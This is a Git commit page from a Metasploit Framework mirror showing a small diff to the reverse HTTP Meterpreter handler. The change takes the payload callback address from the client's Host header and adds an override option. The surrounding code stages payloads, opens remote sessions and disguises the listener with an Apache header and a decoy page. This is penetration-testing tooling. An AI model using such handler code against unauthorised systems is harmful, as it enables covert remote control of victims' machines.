infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Lands #4912, http handlers will use the client's Host header by default.

bug/bundler_fix
HD Moore 2015-03-11 23:23:37 -05:00
parent 215c209f88 dfbc50ff47
commit cdef992d6b
No known key found for this signature in database
GPG Key ID: 7549FB3DB1DD1F32
1 changed files with 12 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
lib/msf/core/handler/reverse_http.rb
View File

@ -53,6 +53,7 @@ module ReverseHttp
OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]), OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]),
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']), OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]), OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
OptBool.new('OverrideRequestHost', [ false, 'Forces clients to connect to LHOST:LPORT instead of keeping original payload host', false ]),
OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>' ]) OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>' ])
], Msf::Handler::ReverseHttp) ], Msf::Handler::ReverseHttp)
end end
@ -92,13 +93,15 @@ module ReverseHttp
# addresses. # addresses.
# #
# @return [String] A URI of the form +scheme://host:port/+ # @return [String] A URI of the form +scheme://host:port/+
def payload_uri def payload_uri(req)
if ipv6? if req and req.headers and req.headers['Host'] and not datastore['OverrideRequestHost']
callback_host = "[#{datastore['LHOST']}]" callback_host = req.headers['Host']
elsif ipv6?
callback_host = "[#{datastore['LHOST']}]:#{datastore['LPORT']}"
else else
callback_host = datastore['LHOST'] callback_host = "#{datastore['LHOST']}:#{datastore['LPORT']}"
end end
"#{scheme}://#{callback_host}:#{datastore['LPORT']}/" "#{scheme}://#{callback_host}/"
end end
# Use the {#refname} to determine whether this handler uses SSL or not # Use the {#refname} to determine whether this handler uses SSL or not
@ -186,7 +189,7 @@ protected
case uri_match case uri_match
when /^\/INITPY/ when /^\/INITPY/
conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16) conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
url = payload_uri + conn_id + '/' url = payload_uri(req) + conn_id + '/'
blob = "" blob = ""
blob << obj.generate_stage blob << obj.generate_stage
@ -221,7 +224,7 @@ protected
when /^\/INITJM/ when /^\/INITJM/
conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16) conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
url = payload_uri + conn_id + "/\x00" url = payload_uri(req) + conn_id + "/\x00"
blob = "" blob = ""
blob << obj.generate_stage blob << obj.generate_stage
@ -249,7 +252,7 @@ protected
when /^\/A?INITM?/ when /^\/A?INITM?/
conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16) conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
url = payload_uri + conn_id + "/\x00" url = payload_uri(req) + conn_id + "/\x00"
print_status("#{cli.peerhost}:#{cli.peerport} Staging connection for target #{req.relative_resource} received...") print_status("#{cli.peerhost}:#{cli.peerport} Staging connection for target #{req.relative_resource} received...")
resp['Content-Type'] = 'application/octet-stream' resp['Content-Type'] = 'application/octet-stream'
@ -294,7 +297,7 @@ protected
create_session(cli, { create_session(cli, {
:passive_dispatcher => obj.service, :passive_dispatcher => obj.service,
:conn_id => conn_id, :conn_id => conn_id,
:url => payload_uri + conn_id + "/\x00", :url => payload_uri(req) + conn_id + "/\x00",
:expiration => datastore['SessionExpirationTimeout'].to_i, :expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i, :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:ssl => ssl?, :ssl => ssl?,